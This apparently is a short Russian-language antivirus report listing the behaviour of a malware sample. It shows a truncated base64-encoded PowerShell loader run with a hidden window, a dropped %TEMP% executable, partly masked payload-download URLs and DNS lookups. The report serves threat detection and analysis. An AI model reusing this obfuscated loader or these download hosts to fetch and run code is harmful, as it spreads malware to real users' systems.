Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAJABwAFMAaABvAG0AZQBbADIAMQBdACsAJABwAFMAaABvAG0AZQBbADMANABdACsAJwBYACcAKQAoACAATgBlAHcALQBPAEIASgBlAGMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AUwBUAHIAZQBhAG0AUgBFAEEARABlAHIAKAAgACgAIABOAG...
- %TEMP%\9506.exe
- %TEMP%\9506.exe
- http://ec###pro.com/tleyLN/
- http://p3###########.shr.prod.phx3.secureserver.net/SharedContent/redirect_0.html
- http://te###kratiya.ru/giG1isC/
- http://so#.sg/dbs/media/sJUjDl/
- http://ro##hill.hu/ooOCqD/
- DNS ASK ec###pro.com
- DNS ASK p3###########.shr.prod.phx3.secureserver.net
- DNS ASK te###kratiya.ru
- DNS ASK xn######dflk8dk.xn--p1ai
- DNS ASK so#.sg
- DNS ASK ro##hill.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACAAJABwAFMAaABvAG0AZQBbADIAMQBdACsAJABwAFMAaABvAG0AZQBbADMANABdACsAJwBYACcAKQAoACAATgBlAHcALQBPAEIASgBlAGMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AUwBUAHIAZQBhAG0AUgBFAEEARABlAHIAKAAgACgAIABOAG...' (со скрытым окном)